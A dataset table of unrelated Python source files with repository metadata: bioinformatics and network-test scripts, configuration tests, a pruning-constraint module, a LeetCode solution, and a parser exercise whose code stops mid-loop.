| max_stars_repo_path (string, length 3–269) | max_stars_repo_name (string, length 4–119) | max_stars_count (int64, 0–191k) | id (string, length 1–7) | content (string, length 6–1.05M) | score (float64, 0.23–5.13) | int_score (int64, 0–5) |
|---|---|---|---|---|---|---|
libs/python_scripts/MetaPathways_MLTreeMap_hits.py
|
ariahahn/MetaPathways_Python.3.0
| 0
|
12784751
|
#!/usr/bin/python
# File created on 27 Jan 2012.
from __future__ import division
__author__ = "<NAME>"
__copyright__ = "Copyright 2013, MetaPathways"
__credits__ = ["r"]
__version__ = "1.0"
__maintainer__ = "<NAME>"
__status__ = "Release"
try:
import os
import re
from os import makedirs, remove, listdir
import sys
from sys import path
from optparse import OptionParser
from libs.python_modules.utils.metapathways_utils import parse_command_line_parameters, fprintf
from libs.python_modules.utils.sysutil import getstatusoutput
except:
print """ Could not load some user defined module functions"""
print """ Make sure your typed \"source MetaPathwaysrc\""""
print """ """
sys.exit(3)
usage= """./MetaPathway_MLTreeMap_hits.py -i input_folder -o output_file """
parser = OptionParser(usage)
parser.add_option("-i", "--input-folder", dest="input_folder",
help='the input mltreemap output folder [REQUIRED]')
parser.add_option("-o", "--output-file", dest="output_file",
help='the output file for COG hits [REQUIRED]')
def check_arguments(opts, args):
if opts.input_folder == None or opts.output_file == None:
return True
else:
return False
def main(argv):
(opts, args) = parser.parse_args()
if check_arguments(opts, args):
print usage
sys.exit(0)
input_folder = opts.input_folder
output_file = opts.output_file
filePATTERN = re.compile(r'.*COG[0-9]*.*\.fa')
cogSeqMatchesPATTERN = re.compile(r'[a-zA-Z]*_(.*)__[0-9]*__*(COG[0-9]*).*\.fa')
cog_hits = []
for file in listdir(input_folder):
if filePATTERN.match(file):
hits = cogSeqMatchesPATTERN.search( file)
if hits:
cog_hits.append((hits.group(1), hits.group(2)))
try:
outputfile = open(output_file, 'w')
except:
print "Cannot open file to MLTreeMap hits"
sys.exit(0)
fprintf(outputfile, "Sequences\tCOG\n")
for seq, cog in cog_hits:
fprintf(outputfile, "%s\t%s\n",seq, cog)
outputfile.close()
# the main function of metapaths
if __name__ == "__main__":
main(sys.argv[1:])
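# Added usage sketch (hypothetical paths): scan an MLTreeMap output folder for COG hits and
# write a tab-separated "Sequences<TAB>COG" table, e.g.
#   ./MetaPathways_MLTreeMap_hits.py -i mltreemap_output/ -o mltreemap_cog_hits.txt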
| 2.453125
| 2
|
common/tests/test_configuration.py
|
vaginessa/irma
| 0
|
12784752
|
#
# Copyright (c) 2013-2018 Quarkslab.
# This file is part of IRMA project.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the top-level directory
# of this distribution and at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# No part of the project, including this file, may be copied,
# modified, propagated, or distributed except according to the
# terms contained in the LICENSE file.
import logging
import unittest
import os
import copy
from irma.configuration.config import ConfigurationSection
from irma.configuration.ini import IniConfiguration, TemplatedConfiguration
from irma.common.exceptions import IrmaConfigurationError
# =================
# Logging options
# =================
def enable_logging(level=logging.INFO, handler=None, formatter=None):
log = logging.getLogger()
if formatter is None:
formatter = logging.Formatter("%(asctime)s [%(name)s] " +
"%(levelname)s: %(message)s")
if handler is None:
handler = logging.StreamHandler()
handler.setFormatter(formatter)
log.addHandler(handler)
log.setLevel(level)
# ============
# Test Cases
# ============
class TestIniConfiguration(unittest.TestCase):
def test_ini_config_value(self):
directory = os.path.dirname(os.path.realpath(__file__))
config = IniConfiguration("{0}/test.ini".format(directory))
self.assertEqual(config["foo"].bar, "foobar")
self.assertEqual(config["foo bar"].foo, "foo")
self.assertEqual(config["foo bar"].bar, "bar")
def test_ini_config_types(self):
directory = os.path.dirname(os.path.realpath(__file__))
config = IniConfiguration("{0}/test.ini".format(directory))
self.assertEqual(isinstance(config, IniConfiguration),
True)
self.assertEqual(isinstance(config["foo bar"], ConfigurationSection),
True)
self.assertEqual(isinstance(config["foo bar"].bar, str),
True)
template = {'foo':
[('bar', TemplatedConfiguration.string, None)],
'foo bar':
[('foo', TemplatedConfiguration.string, None),
('bar', TemplatedConfiguration.string, None),
('val', TemplatedConfiguration.integer, 1337)],
'bar':
[('foo1', TemplatedConfiguration.integer, 42),
('foo2', TemplatedConfiguration.string, "Answer"),
('foo3', TemplatedConfiguration.boolean, None),
('foo4', TemplatedConfiguration.boolean, False)
]
}
class TestTemplatedConfiguration(unittest.TestCase):
def test_templated_config_value(self):
directory = os.path.dirname(os.path.realpath(__file__))
template_path = "{0}/test.ini".format(directory)
config = TemplatedConfiguration(template_path, template)
self.assertTrue(isinstance(config, TemplatedConfiguration))
self.assertEqual(config["foo"].bar, "foobar")
self.assertEqual(config["foo bar"].foo, "foo")
self.assertEqual(config["foo bar"].bar, "bar")
self.assertEqual(config["bar"].foo1, 65)
self.assertTrue(config["bar"].foo3)
def test_templated_config_default_value(self):
directory = os.path.dirname(os.path.realpath(__file__))
template_path = "{0}/test.ini".format(directory)
config = TemplatedConfiguration(template_path, template)
self.assertEqual(config["foo bar"].val, 1337)
self.assertEqual(config["bar"].foo2, "Answer")
self.assertFalse(config["bar"].foo4)
def test_templated_config_missing_value(self):
directory = os.path.dirname(os.path.realpath(__file__))
template1 = copy.copy(template)
template1['missingsection'] = [
('missingkey', TemplatedConfiguration.string, None)]
with self.assertRaises(IrmaConfigurationError):
TemplatedConfiguration("{0}/test.ini".format(directory), template1)
def test_templated_config_section_only_default_value(self):
directory = os.path.dirname(os.path.realpath(__file__))
template1 = copy.copy(template)
template1['missingsection'] = [
('missingkey', TemplatedConfiguration.string, "with_def_value")]
config = TemplatedConfiguration("{0}/test.ini".format(directory),
template1)
self.assertTrue(isinstance(config["missingsection"],
ConfigurationSection))
self.assertEqual(config["missingsection"].missingkey,
"with_def_value")
def test_templated_config_value_with_space(self):
directory = os.path.dirname(os.path.realpath(__file__))
template1 = copy.copy(template)
template1['missingsection'] = [
('one missing key',
TemplatedConfiguration.string,
"with_def_value")]
config = TemplatedConfiguration("{0}/test.ini".format(directory),
template1)
self.assertTrue(isinstance(config["missingsection"],
ConfigurationSection))
self.assertEqual(config["missingsection"]["one missing key"],
"with_def_value")
def test_templated_config_wrong_template_tuple_instead_of_list(self):
directory = os.path.dirname(os.path.realpath(__file__))
template1 = copy.copy(template)
template1['missingsection'] = (('key',
TemplatedConfiguration.string,
None))
with self.assertRaises(IrmaConfigurationError):
TemplatedConfiguration("{0}/test.ini".format(directory), template1)
def test_templated_config_wrong_value(self):
directory = os.path.dirname(os.path.realpath(__file__))
template_path = "{0}/test.ini".format(directory)
template1 = copy.copy(template)
template1['WrongVal'] = [('an_int',
TemplatedConfiguration.integer,
None)]
with self.assertRaises(IrmaConfigurationError):
TemplatedConfiguration(template_path, template1)
if __name__ == '__main__':
enable_logging()
unittest.main()
| 2.046875
| 2
|
a.py
|
JuYeong98/st-gcn
| 2
|
12784753
|
<filename>a.py
import os
print("before: %s"%os.getcwd())
os.chdir("/work_dir")
print("after: %s"%os.getcwd())
| 2.65625
| 3
|
torchopt/optim/constraint.py
|
r-papso/torch-accelerator
| 0
|
12784754
|
<reponame>r-papso/torch-accelerator
from abc import ABC, abstractmethod
from typing import Any
from torch import nn
from ..prune.pruner import Pruner
from .cache import Cache
class Constraint(ABC):
"""Abstract class representing a constraint in optimization problems."""
def __init__(self) -> None:
"""Ctor."""
super().__init__()
@abstractmethod
def feasible(self, solution: Any) -> bool:
"""Determines if solution produced by optimization algorithm satisfies given constraint.
Args:
solution (Any): Solution produced by optimization algorithm to be evaluated.
Returns:
bool: True if solution satisfies given constraint, False otherwise.
"""
pass
class ConstraintContainer(Constraint):
"""Represents a container for modelling optimization problems with multiple conditions.
Constraint represented by ConstraintContainer is considered feasible (i. e. function feasible
returns True) if and only if all of the constraints within the container are satisfied.
"""
def __init__(self, *constraints: Constraint) -> None:
"""Ctor.
Args:
constraints (Constraint): List of constraints to be added to the container.
"""
super().__init__()
self._constrs = constraints
def feasible(self, solution: Any) -> bool:
return all(constr.feasible(solution) for constr in self._constrs)
class ChannelConstraint(Constraint):
"""Constrain for checking a validity of pruning mask.
Constraint checks if solution, which represents pruning mask, will produce valid pruned
model (neural network). Pruned model is invalid if any of it's weight tensors are fully
pruned, i. e. weight tensor's first dimension is less than 1.
"""
def __init__(self, model: nn.Module, pruner: Pruner) -> None:
"""Ctor.
Args:
model (nn.Module): Model to be pruned.
pruner (Pruner): Pruner used for pruning the model.
"""
super().__init__()
self._pruner = pruner
self._model = model
def feasible(self, solution: Any) -> bool:
model = Cache.get_pruned_model(self._model, self._pruner, solution)
for module in model.modules():
weight = getattr(module, "weight", None)
if weight is not None and any(dim <= 0 for dim in weight.shape):
return False
return True
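# Added usage sketch (assumes a concrete Pruner implementation from ..prune.pruner and a
# candidate pruning mask `solution` produced by the optimizer; not part of the original module):
#
#   constraints = ConstraintContainer(ChannelConstraint(model, pruner))
#   if constraints.feasible(solution):
#       ...  # accept the candidate mask, otherwise discard it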
| 3.078125
| 3
|
py-scripts/scripts_deprecated/lf_check_jbr.py
|
alexman69420/lanforge-scripts
| 11
|
12784755
|
#!/usr/bin/python3
'''
NAME:
lf_check.py
PURPOSE:
lf_check.py will run a series of tests based on the test TEST_DICTIONARY listed in lf_check_config.ini.
The lf_check_config.ini file is copied from lf_check_config_template.ini and local configuration is made
to the lf_check_config.ini.
EXAMPLE:
lf_check.py
NOTES:
Before using lf_check.py
1. copy lf_check_config_template.ini to lf_check_config.ini
2. update lf_check_config.ini to enable (TRUE) the tests to be run in the TEST_DICTIONARY; the TEST_DICTIONARY needs to be passed in
'''
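# Added sketch of the lf_check_config.ini sections consumed by read_config_contents() below
# (key names come from this script; values live in the template file and are not shown here):
#   [LF_MGR]            LF_MGR_IP, LF_MGR_PORT
#   [TEST_NETWORK]      HTTP_TEST_IP, FTP_TEST_IP, TEST_IP
#   [TEST_GENERIC]      RADIO_USED, SSID_USED, SSID_PW_USED, SECURITY_USED, NUM_STA, COL_NAMES, UPSTREAM_PORT
#   [TEST_PARAMETERS]   TEST_TIMEOUT, LOAD_BLANK_DB, LOAD_FACTORY_DEFAULT_DB, LOAD_CUSTOM_DB, CUSTOM_DB,
#                       PRODUCTION_RUN, EMAIL_LIST_PRODUCTION, HOST_IP_PRODUCTION, EMAIL_LIST_TEST, HOST_IP_TEST
#   [RADIO_DICTIONARY]  RADIO_DICT (JSON), and [TEST_DICTIONARY] TEST_DICT (JSON, one entry per test)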
import datetime
import pprint
import sys
if sys.version_info[0] != 3:
print("This script requires Python3")
exit()
import os
import socket
import logging
import time
from time import sleep
import argparse
import json
import configparser
import subprocess
import csv
import shutil
import os.path
# lf_report is from the parent of the current file
dir_path = os.path.dirname(os.path.realpath(__file__))
parent_dir_path = os.path.abspath(os.path.join(dir_path,os.pardir))
sys.path.insert(0, parent_dir_path)
#sys.path.append('../')
from lf_report import lf_report
sys.path.append('/')
CONFIG_FILE = os.getcwd() + '/lf_check_config.ini'
RUN_CONDITION = 'ENABLE'
# setup logging FORMAT
FORMAT = '%(asctime)s %(name)s %(levelname)s: %(message)s'
# lf_check class contains the verification configuration and orchestrates the testing.
class lf_check():
def __init__(self,
_csv_results,
_outfile):
self.lf_mgr_ip = ""
self.lf_mgr_port = ""
self.radio_dict = {}
self.test_dict = {}
path_parent = os.path.dirname(os.getcwd())
os.chdir(path_parent)
self.scripts_wd = os.getcwd()
self.results = ""
self.outfile = _outfile
self.test_result = "Failure"
self.results_col_titles = ["Test","Command","Result","STDOUT","STDERR"]
self.html_results = ""
self.background_green = "background-color:green"
self.background_red = "background-color:red"
self.background_purple = "background-color:purple"
self.http_test_ip = ""
self.ftp_test_ip = ""
self.test_ip = ""
# section TEST_GENERIC
self.radio_lf = ""
self.ssdi = ""
self.ssid_pw = ""
self.security = ""
self.num_sta = ""
self.col_names = ""
self.upstream_port = ""
self.csv_results = _csv_results
self.csv_results_file = ""
self.csv_results_writer = ""
self.csv_results_column_headers = ""
self.logger = logging.getLogger(__name__)
self.test_timeout = 120
self.use_blank_db = "FALSE"
self.use_factory_default_db = "FALSE"
self.use_custom_db = "FALSE"
self.production_run = "FALSE"
self.email_list_production = ""
self.host_ip_production = None
self.email_list_test = ""
self.host_ip_test = None
# NOT complete : will send the email results
def send_results_email(self, report_file=None):
if (report_file is None):
print( "No report file, not sending email.")
return
report_url=report_file.replace('/home/lanforge/', '')
if report_url.startswith('/'):
report_url = report_url[1:]
# Following recommendation
# NOTE: https://stackoverflow.com/questions/24196932/how-can-i-get-the-ip-address-from-nic-in-python
#command = 'echo "$HOSTNAME mail system works!" | mail -s "Test: $HOSTNAME $(date)" chuck.re<EMAIL>'
hostname = socket.gethostname()
ip = socket.gethostbyname(hostname)
message_txt = """Results from {hostname}:\\n
http://{ip}/{report}\\n
NOTE: for now to see stdout and stderr remove /home/lanforge from path.\\n
""".format(hostname=hostname, ip=ip, report=report_url)
mail_subject = "Regression Test [{hostname}] {date}".format(hostname=hostname,
date=datetime.datetime.now())
try:
if self.production_run == "TRUE":
msg = message_txt.format(ip=self.host_ip_production)
command = "echo \"{message}\" | mail -s \"{subject}\" {address}".format(
message=msg,
subject=mail_subject,
ip=self.host_ip_production,
address=self.email_list_production)
else:
msg = message_txt.format(ip=ip)
command = "echo \"{message}\" | mail -s \"{subject}\" {address}".format(
message=msg,
subject=mail_subject,
ip=ip, #self.host_ip_test,
address=self.email_list_test)
print("running:[{}]".format(command))
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
# have email on separate timeout
process.wait(timeout=int(self.test_timeout))
except subprocess.TimeoutExpired:
print("send email timed out")
process.terminate()
def get_csv_results(self):
return self.csv_results_file.name
def start_csv_results(self):
print("self.csv_results")
self.csv_results_file = open(self.csv_results, "w")
self.csv_results_writer = csv.writer(self.csv_results_file, delimiter=",")
self.csv_results_column_headers = ['Test','Command','Result','STDOUT','STDERR']
self.csv_results_writer.writerow(self.csv_results_column_headers)
self.csv_results_file.flush()
def get_html_results(self):
return self.html_results
def start_html_results(self):
self.html_results += """
<table border="1" class="dataframe">
<thead>
<tr style="text-align: left;">
<th>Test</th>
<th>Command</th>
<th>Result</th>
<th>STDOUT</th>
<th>STDERR</th>
</tr>
</thead>
<tbody>
"""
def finish_html_results(self):
self.html_results += """
</tbody>
</table>
<br>
<br>
<br>
"""
# Functions in this section are/can be overridden by descendants
# This code reads the lf_check_config.ini file to populate the test variables
def read_config_contents(self):
self.logger.info("read_config_contents {}".format(CONFIG_FILE))
config_file = configparser.ConfigParser()
success = True
success = config_file.read(CONFIG_FILE)
self.logger.info("logger worked")
if 'LF_MGR' in config_file.sections():
section = config_file['LF_MGR']
self.lf_mgr_ip = section['LF_MGR_IP']
self.lf_mgr_port = section['LF_MGR_PORT']
self.logger.info("lf_mgr_ip {}".format(self.lf_mgr_ip))
self.logger.info("lf_mgr_port {}".format(self.lf_mgr_port))
if 'TEST_NETWORK' in config_file.sections():
section = config_file['TEST_NETWORK']
self.http_test_ip = section['HTTP_TEST_IP']
self.logger.info("http_test_ip {}".format(self.http_test_ip))
self.ftp_test_ip = section['FTP_TEST_IP']
self.logger.info("ftp_test_ip {}".format(self.ftp_test_ip))
self.test_ip = section['TEST_IP']
self.logger.info("test_ip {}".format(self.test_ip))
if 'TEST_GENERIC' in config_file.sections():
section = config_file['TEST_GENERIC']
self.radio_lf = section['RADIO_USED']
self.logger.info("radio_lf {}".format(self.radio_lf))
self.ssid = section['SSID_USED']
self.logger.info("ssid {}".format(self.ssid))
self.ssid_pw = section['SSID_PW_USED']
self.logger.info("ssid_pw {}".format(self.ssid_pw))
self.security = section['SECURITY_USED']
self.logger.info("secruity {}".format(self.security))
self.num_sta = section['NUM_STA']
self.logger.info("num_sta {}".format(self.num_sta))
self.col_names = section['COL_NAMES']
self.logger.info("col_names {}".format(self.col_names))
self.upstream_port = section['UPSTREAM_PORT']
self.logger.info("upstream_port {}".format(self.upstream_port))
if 'TEST_PARAMETERS' in config_file.sections():
section = config_file['TEST_PARAMETERS']
self.test_timeout = section['TEST_TIMEOUT']
self.use_blank_db = section['LOAD_BLANK_DB']
self.use_factory_default_db = section['LOAD_FACTORY_DEFAULT_DB']
self.use_custom_db = section['LOAD_CUSTOM_DB']
self.custom_db = section['CUSTOM_DB']
self.production_run = section['PRODUCTION_RUN']
self.email_list_production = section['EMAIL_LIST_PRODUCTION']
self.host_ip_production = section['HOST_IP_PRODUCTION']
self.email_list_test = section['EMAIL_LIST_TEST']
self.host_ip_test = section['HOST_IP_TEST']
if 'RADIO_DICTIONARY' in config_file.sections():
section = config_file['RADIO_DICTIONARY']
self.radio_dict = json.loads(section.get('RADIO_DICT', self.radio_dict))
self.logger.info("self.radio_dict {}".format(self.radio_dict))
if 'TEST_DICTIONARY' in config_file.sections():
section = config_file['TEST_DICTIONARY']
# for JSON, replace \n and \r since they are invalid JSON characters; this allows multi-line args
try:
self.test_dict = json.loads(section.get('TEST_DICT', self.test_dict).replace('\n',' ').replace('\r',' '))
self.logger.info("TEST_DICTIONARY: {}".format(self.test_dict))
except:
self.logger.info("Excpetion loading TEST_DICTIONARY, is there comma after the last entry? Check syntax")
def load_factory_default_db(self):
#self.logger.info("file_wd {}".format(self.scripts_wd))
try:
os.chdir(self.scripts_wd)
#self.logger.info("Current Working Directory {}".format(os.getcwd()))
except:
self.logger.info("failed to change to {}".format(self.scripts_wd))
# no spaces after FACTORY_DFLT
command = "./{} {}".format("scenario.py", "--load FACTORY_DFLT")
process = subprocess.Popen((command).split(' '), shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
# wait for the process to terminate
out, err = process.communicate()
errcode = process.returncode
# Not currently used
def load_blank_db(self):
#self.logger.info("file_wd {}".format(self.scripts_wd))
try:
os.chdir(self.scripts_wd)
#self.logger.info("Current Working Directory {}".format(os.getcwd()))
except:
self.logger.info("failed to change to {}".format(self.scripts_wd))
# no spaces after FACTORY_DFLT
command = "./{} {}".format("scenario.py", "--load BLANK")
process = subprocess.Popen((command).split(' '), shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
def load_custom_db(self,custom_db):
#self.logger.info("file_wd {}".format(self.scripts_wd))
try:
os.chdir(self.scripts_wd)
#self.logger.info("Current Working Directory {}".format(os.getcwd()))
except:
self.logger.info("failed to change to {}".format(self.scripts_wd))
# no spaces in the custom db name
command = "./{} {}".format("scenario.py", "--load {}".format(custom_db))
process = subprocess.Popen((command).split(' '), shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
# wait for the process to terminate
out, err = process.communicate()
errcode = process.returncode
def run_script_test(self):
self.start_html_results()
self.start_csv_results()
for test in self.test_dict:
if self.test_dict[test]['enabled'] == "FALSE":
self.logger.info("test: {} skipped".format(test))
# load the default database
elif self.test_dict[test]['enabled'] == "TRUE":
# Make the command replacement a separate method call.
# loop through radios
for radio in self.radio_dict:
# Replace RADIO, SSID, PASSWD, SECURITY with actual config values (e.g. RADIO_0_CFG to values)
# not "KEY" is just a word to refer to the RADIO define (e.g. RADIO_0_CFG) to get the vlaues
# --num_stations needs to be int not string (no double quotes)
if self.radio_dict[radio]["KEY"] in self.test_dict[test]['args']:
self.test_dict[test]['args'] = self.test_dict[test]['args'].replace(self.radio_dict[radio]["KEY"],'--radio {} --ssid {} --passwd {} --security {} --num_stations {}'
.format(self.radio_dict[radio]['RADIO'],self.radio_dict[radio]['SSID'],self.radio_dict[radio]['PASSWD'],self.radio_dict[radio]['SECURITY'],self.radio_dict[radio]['STATIONS']))
if 'HTTP_TEST_IP' in self.test_dict[test]['args']:
self.test_dict[test]['args'] = self.test_dict[test]['args'].replace('HTTP_TEST_IP',self.http_test_ip)
if 'FTP_TEST_IP' in self.test_dict[test]['args']:
self.test_dict[test]['args'] = self.test_dict[test]['args'].replace('FTP_TEST_IP',self.ftp_test_ip)
if 'TEST_IP' in self.test_dict[test]['args']:
self.test_dict[test]['args'] = self.test_dict[test]['args'].replace('TEST_IP',self.test_ip)
if 'RADIO_USED' in self.test_dict[test]['args']:
self.test_dict[test]['args'] = self.test_dict[test]['args'].replace('RADIO_USED',self.radio_lf)
if 'SSID_USED' in self.test_dict[test]['args']:
self.test_dict[test]['args'] = self.test_dict[test]['args'].replace('SSID_USED',self.ssid)
if 'SSID_PW_USED' in self.test_dict[test]['args']:
self.test_dict[test]['args'] = self.test_dict[test]['args'].replace('SSID_PW_USED',self.ssid_pw)
if 'SECURITY_USED' in self.test_dict[test]['args']:
self.test_dict[test]['args'] = self.test_dict[test]['args'].replace('SECURITY_USED',self.security)
if 'NUM_STA' in self.test_dict[test]['args']:
self.test_dict[test]['args'] = self.test_dict[test]['args'].replace('NUM_STA',self.num_sta)
if 'COL_NAMES' in self.test_dict[test]['args']:
self.test_dict[test]['args'] = self.test_dict[test]['args'].replace('COL_NAMES',self.col_names)
if 'UPSTREAM_PORT' in self.test_dict[test]['args']:
self.test_dict[test]['args'] = self.test_dict[test]['args'].replace('UPSTREAM_PORT',self.upstream_port)
if self.use_factory_default_db == "TRUE":
self.load_factory_default_db()
sleep(3)
self.logger.info("FACTORY_DFLT loaded between tests with scenario.py --load FACTORY_DFLT")
if self.use_blank_db == "TRUE":
self.load_blank_db()
sleep(1)
self.logger.info("BLANK loaded between tests with scenario.py --load BLANK")
if self.use_custom_db == "TRUE":
try:
self.load_custom_db(self.custom_db)
sleep(1)
self.logger.info("{} loaded between tests with scenario.py --load {}".format(self.custom_db,self.custom_db))
except:
self.logger.info("custom database failed to load check existance and location")
else:
self.logger.info("no db loaded between tests: {}".format(self.use_custom_db))
sleep(1) # the sleep is to allow the database to stabilize
try:
os.chdir(self.scripts_wd)
#self.logger.info("Current Working Directory {}".format(os.getcwd()))
except:
self.logger.info("failed to change to {}".format(self.scripts_wd))
cmd_args = "{}".format(self.test_dict[test]['args'])
command = "./{} {}".format(self.test_dict[test]['command'], cmd_args)
self.logger.info("command: {}".format(command))
self.logger.info("cmd_args {}".format(cmd_args))
if self.outfile is not None:
stdout_log_txt = self.outfile
stdout_log_txt = stdout_log_txt + "-{}-stdout.txt".format(test)
#self.logger.info("stdout_log_txt: {}".format(stdout_log_txt))
stdout_log = open(stdout_log_txt, 'a')
stderr_log_txt = self.outfile
stderr_log_txt = stderr_log_txt + "-{}-stderr.txt".format(test)
#self.logger.info("stderr_log_txt: {}".format(stderr_log_txt))
stderr_log = open(stderr_log_txt, 'a')
print("running {}".format(command))
process = subprocess.Popen((command).split(' '), shell=False, stdout=stdout_log, stderr=stderr_log, universal_newlines=True)
try:
#out, err = process.communicate()
process.wait(timeout=int(self.test_timeout))
except subprocess.TimeoutExpired:
process.terminate()
self.test_result = "TIMEOUT"
#if err:
# self.logger.info("command Test timed out: {}".format(command))
#self.logger.info(stderr_log_txt)
if(self.test_result != "TIMEOUT"):
stderr_log_size = os.path.getsize(stderr_log_txt)
if stderr_log_size > 0 :
self.logger.info("File: {} is not empty: {}".format(stderr_log_txt,str(stderr_log_size)))
self.test_result = "Failure"
background = self.background_red
else:
self.logger.info("File: {} is empty: {}".format(stderr_log_txt,str(stderr_log_size)))
self.test_result = "Success"
background = self.background_green
else:
self.logger.info("TIMEOUT FAILURE, Check LANforge Radios")
self.test_result = "Time Out"
background = self.background_purple
self.html_results += """
<tr><td>""" + str(test) + """</td><td class='scriptdetails'>""" + str(command) + """</td>
<td style="""+ str(background) + """>""" + str(self.test_result) + """
<td><a href=""" + str(stdout_log_txt) + """ target=\"_blank\">STDOUT</a></td>"""
if self.test_result == "Failure":
self.html_results += """<td><a href=""" + str(stderr_log_txt) + """ target=\"_blank\">STDERR</a></td>"""
elif self.test_result == "Time Out":
self.html_results += """<td><a href=""" + str(stderr_log_txt) + """ target=\"_blank\">STDERR</a></td>"""
#self.html_results += """<td></td>"""
else:
self.html_results += """<td></td>"""
self.html_results += """</tr>"""
row = [test,command,self.test_result,stdout_log_txt,stderr_log_txt]
self.csv_results_writer.writerow(row)
self.csv_results_file.flush()
#self.logger.info("row: {}".format(row))
self.logger.info("test: {} executed".format(test))
else:
self.logger.info("enable value {} invalid for test: {}, test skipped".format(self.test_dict[test]['enabled'],test))
self.finish_html_results()
def main():
# arguments
parser = argparse.ArgumentParser(
prog='lf_check.py',
formatter_class=argparse.RawTextHelpFormatter,
epilog='''\
lf_check.py : for running scripts listed in lf_check_config.ini file
''',
description='''\
lf_check.py
-----------
Summary :
---------
for running scripts listed in lf_check_config.ini
''')
parser.add_argument('--outfile', help="--outfile <Output Generic Name> used as base name for all files generated", default="")
parser.add_argument('--logfile', help="--logfile <logfile Name> logging for output of lf_check.py script", default="lf_check.log")
args = parser.parse_args()
# output report.
report = lf_report(_results_dir_name="lf_check",
_output_html="lf_check.html",
_output_pdf="lf-check.pdf")
current_time = time.strftime("%Y-%m-%d-%H-%M-%S", time.localtime())
csv_results = "lf_check{}-{}.csv".format(args.outfile,current_time)
csv_results = report.file_add_path(csv_results)
outfile = "lf_check-{}-{}".format(args.outfile,current_time)
outfile_path = report.file_add_path(outfile)
# lf_check() class created
check = lf_check(_csv_results = csv_results,
_outfile = outfile_path)
# get the git sha
process = subprocess.Popen(["git", "rev-parse", "HEAD"], stdout=subprocess.PIPE)
(commit_hash, err) = process.communicate()
exit_code = process.wait()
git_sha = commit_hash.decode('utf-8','ignore')
# set up logging
logfile = args.logfile[:-4]
print("logfile: {}".format(logfile))
logfile = "{}-{}.log".format(logfile,current_time)
logfile = report.file_add_path(logfile)
print("logfile {}".format(logfile))
formatter = logging.Formatter(FORMAT)
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
file_handler = logging.FileHandler(logfile, "w")
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
logger.addHandler(logging.StreamHandler(sys.stdout)) # allows logging to both file and stdout
logger.info("commit_hash: {}".format(commit_hash))
logger.info("commit_hash2: {}".format(commit_hash.decode('utf-8','ignore')))
check.read_config_contents() # CMR need mode to just print out the test config and not run
check.run_script_test()
# Generate output reports
report.set_title("LF Check: lf_check.py")
report.build_banner()
report.start_content_div()
report.set_table_title("LF Check Test Results")
report.build_table_title()
report.set_text("git sha: {}".format(git_sha))
report.build_text()
html_results = check.get_html_results()
report.set_custom_html(html_results)
report.build_custom()
html_report = report.write_html_with_timestamp()
print("html report: {}".format(html_report))
report.write_pdf_with_timestamp()
report_path = os.path.dirname(html_report)
parent_report_dir = os.path.dirname(report_path)
# copy results to "latest" so someone may see the latest run.
lf_check_latest_html = parent_report_dir + "/lf_check_latest.html"
# duplicates html_report file up one directory
lf_check_html_report = parent_report_dir + "/{}.html".format(outfile)
#
banner_src_png = report_path + "/banner.png"
banner_dest_png = parent_report_dir + "/banner.png"
CandelaLogo_src_png = report_path + "/CandelaLogo2-90dpi-200x90-trans.png"
CandelaLogo_dest_png = parent_report_dir + "/CandelaLogo2-90dpi-200x90-trans.png"
report_src_css = report_path + "/report.css"
report_dest_css = parent_report_dir + "/report.css"
custom_src_css = report_path + "/custom.css"
custom_dest_css = parent_report_dir + "/custom.css"
font_src_woff = report_path + "/CenturyGothic.woff"
font_dest_woff = parent_report_dir + "/CenturyGothic.woff"
#pprint.pprint([
# ('banner_src', banner_src_png),
# ('banner_dest', banner_dest_png),
# ('CandelaLogo_src_png', CandelaLogo_src_png),
# ('CandelaLogo_dest_png', CandelaLogo_dest_png),
# ('report_src_css', report_src_css),
# ('custom_src_css', custom_src_css)
#])
# copy one directory above
shutil.copyfile(html_report, lf_check_latest_html)
shutil.copyfile(html_report, lf_check_html_report)
# copy banner and logo
shutil.copyfile(banner_src_png, banner_dest_png)
shutil.copyfile(CandelaLogo_src_png, CandelaLogo_dest_png)
shutil.copyfile(report_src_css, report_dest_css)
shutil.copyfile(custom_src_css, custom_dest_css)
shutil.copyfile(font_src_woff, font_dest_woff)
print("lf_check_latest.html: "+lf_check_latest_html)
print("lf_check_html_report: "+lf_check_html_report)
check.send_results_email(report_file=lf_check_html_report)
if __name__ == '__main__':
main()
| 2.390625
| 2
|
python/867.transpose-matrix.py
|
fengbaoheng/leetcode
| 1
|
12784756
|
#
# @lc app=leetcode.cn id=867 lang=python3
#
# [867] 转置矩阵
#
from typing import List
class Solution:
def transpose(self, A: List[List[int]]) -> List[List[int]]:
if A is None:
return []
rows = len(A)
if rows == 0:
return []
cols = len(A[0])
if cols == 0:
return []
B = []
for c in range(cols):
B.append([A[r][c] for r in range(rows)])
return B
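# Added note (not part of the original submission): the same transpose can be written with
# zip, e.g.  return [list(row) for row in zip(*A)]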
| 3.484375
| 3
|
CS6900/Assignment05/tdbptay.py
|
aashishyadavally/MS_AI_Coursework
| 0
|
12784757
|
"""
Name: <NAME>
"""
import heapq
g4 = [('S',['a','S','S']),
('S',[])]
def tdpstep(g, input_categories_parses): # compute all possible next steps from (ws,cs)
global n_steps
(ws,cs,p) = input_categories_parses
if len(cs)>0:
cs1=cs[1:] # copy of predicted categories except cs[0]
p1 = p[:] # copy of rules used so far
nextsteps=[]
for (lhs,rhs) in g:
if lhs == cs[0]:
n_steps += 1
print('expand',lhs,'->',rhs) # for trace
nextsteps.append((ws,rhs+cs1,p1+[[lhs]+rhs]))
if len(ws)>0 and ws[0] == cs[0]:
n_steps += 1
print('scan',ws[0]) # for trace
ws1=ws[1:]
nextsteps.append((ws1,cs1,p1))
return nextsteps
else:
return []
def derive(g,beam,k):
while beam != [] and not (min(beam)[1] == [] and min(beam)[2] == []):
(prob0,ws0,cs0,p0) = heapq.heappop(beam)
nextsteps = tdpstep(g,(ws0,cs0,p0))
print('nextsteps=',nextsteps)
if len(nextsteps) > 0:
prob1 = prob0/float(len(nextsteps))
if -(prob1) > k:
for (ws1,cs1,p1) in nextsteps:
